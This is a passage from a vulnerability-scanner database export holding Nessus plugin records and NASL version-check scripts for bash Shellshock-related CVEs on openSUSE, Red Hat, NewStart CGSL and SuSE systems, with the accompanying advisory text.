or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debuginfo-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debugsource-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-devel-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-lang-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-debuginfo-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-debuginfo-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"readline-devel-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", 
reference:\"libreadline6-32bit-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-61.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:44", "description": "[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. 
Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 / 6 : bash (RHSA-2014:1311)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:6.4", "cpe:/o:redhat:enterprise_linux:6.2", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc"], "id": "REDHAT-RHSA-2014-1311.NASL", "href": "https://www.tenable.com/plugins/nessus/79052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat 
Security Advisory RHSA-2014:1311. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79052);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1311\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 4 / 5 / 6 : bash (RHSA-2014:1311)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat\nEnterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended\nUpdate Support, Red Hat Enterprise Linux 6.2 Advanced Update Support,\nand Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. 
An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1311\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1311\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"bash-3.0-27.el4.4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"bash-3.0-27.el4.4\")) flag++;\n\n\n if 
(rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"bash-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"bash-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++;\n\nif (sp == \"2\") { if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-4.1.2-9.el6_2.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++; }\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++;\n\nif (sp == \"2\") { if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-9.el6_2.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", 
reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++; }\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-9.el6_2.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:34:45", "description": "The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple vulnerabilities:\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute arbitrary code via shell metacharacters placed in 'hostname' of a machine. 
(CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted SHELLOPTS and PS4 environment variables. (CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-10-27T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-0634", "CVE-2016-7543"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:zte:cgsl_main:bash", "p-cpe:/a:zte:cgsl_main:bash-debuginfo", "p-cpe:/a:zte:cgsl_main:bash-debugsource", "p-cpe:/a:zte:cgsl_main:bash-devel", "p-cpe:/a:zte:cgsl_main:bash-doc", "cpe:/o:zte:cgsl_main:6"], "id": "NEWSTART_CGSL_NS-SA-2021-0118_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/154582", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0118. 
The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154582);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2016-0634\", \"CVE-2016-7543\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NewStart CGSL host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple\nvulnerabilities:\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in\n the values of environment variables, which allows remote attackers to write to files or possibly have\n unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for\n CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute\n arbitrary code via shell metacharacters placed in 'hostname' of a machine. (CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted\n SHELLOPTS and PS4 environment variables. 
(CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0118\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-0634\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-7543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL bash packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2016-7543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debugsource\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_main:6\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL MAIN 6.02\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 6.02');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nvar flag = 0;\n\nvar pkgs = {\n 'CGSL MAIN 6.02': [\n 'bash-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debuginfo-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debugsource-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-devel-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-doc-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97'\n ]\n};\nvar pkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n 
severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bash');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:21:58", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances. (CVE-2014-7169)\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_. This hardening feature is work in progress and might be improved in later updates.\n\nAdditionally, two other security issues have been fixed :\n\n - Nested HERE documents could lead to a crash of bash.\n (CVE-2014-7186)\n\n - Nesting of for loops could lead to a crash of bash.\n (CVE-2014-7187)", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : bash (SAT Patch Number 9780)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:bash", "p-cpe:/a:novell:suse_linux:11:bash-doc", "p-cpe:/a:novell:suse_linux:11:libreadline5", "p-cpe:/a:novell:suse_linux:11:libreadline5-32bit", "p-cpe:/a:novell:suse_linux:11:readline-doc", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_BASH-140926.NASL", "href": "https://www.tenable.com/plugins/nessus/77958", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 
update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77958);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"SuSE 11.3 Security Update : bash (SAT Patch Number 9780)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances. (CVE-2014-7169)\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and is less serious due to\nthe special, non-default system configuration that is needed to create\nan exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with\nBASH_FUNC_. 
This hardening feature is work in progress and might be\nimproved in later updates.\n\nAdditionally, two other security issues have been fixed :\n\n - Nested HERE documents could lead to a crash of bash.\n (CVE-2014-7186)\n\n - Nesting of for loops could lead to a crash of bash.\n (CVE-2014-7187)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-6271.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7169.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7186.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7187.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 9780.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n 
